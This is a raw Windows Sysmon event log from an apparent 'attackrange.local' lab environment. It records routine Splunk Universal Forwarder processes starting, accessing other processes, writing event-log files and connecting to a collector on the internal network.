07:51:00.519{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103599Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.519{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B264-615A-CF01-00000000FC01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103598Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.519{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B264-615A-CF01-00000000FC01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103597Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.520{58E9C193-B264-615A-CF01-00000000FC01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081457Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:01.911{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2616E9EED90258E65EB62C4EA4FB33A,SHA256=F23D9A899D462D0227B15D05165547B3B059ABB79CB379B8DD65C7F2A03B4B88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103607Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:01.864{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E540B9ED919E94E276E181133EF106D5,SHA256=DCC1D7CB937DD6A97745D4A17A62EDD94FD217BAF885518ED33C56C7665B8122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103617Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.879{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0788010008CB83515631A1D5F91DFDD,SHA256=DB6A4CFE5DE06DFE358E7D7E2E8E2C1BE439E6A28D14D0C24C009FFFFB982635,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081458Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:59.776{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50028-false10.0.1.12-8000- 10341000x8000000000000000103616Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.488{58E9C193-B266-615A-D001-00000000FC01}52484332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103615Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B266-615A-D001-00000000FC01}5248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103614Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103613Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103612Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103611Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103610Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B266-615A-D001-00000000FC01}5248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103609Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.254{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B266-615A-D001-00000000FC01}5248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103608Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.255{58E9C193-B266-615A-D001-00000000FC01}5248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000103638Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.989{58E9C193-B267-615A-D201-00000000FC01}65166312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000103637Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:02.303{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49530-false10.0.1.12-8000- 23542300x8000000000000000103636Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.879{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD2EF3912AAA8C86D12BED574FB86E15,SHA256=88B2E044404025BB6A3D1405453C63A71CEA7D287BFED3799C6D7CBD4513F2BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081459Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:03.145{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4079F3B680EF2EE109C772316EC62332,SHA256=2AFAF228AE9F3A6199BA0EAE96CC1B305C6F39FCF9164C1A3D0E2045020FED7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103635Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B267-615A-D201-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103634Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103633Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103632Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103631Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103630Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B267-615A-D201-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103629Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.770{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B267-615A-D201-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103628Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.771{58E9C193-B267-615A-D201-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000103627Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.551{58E9C193-B267-615A-D101-00000000FC01}69844944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103626Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.269{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B267-615A-D101-00000000FC01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103625Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.269{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103624Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 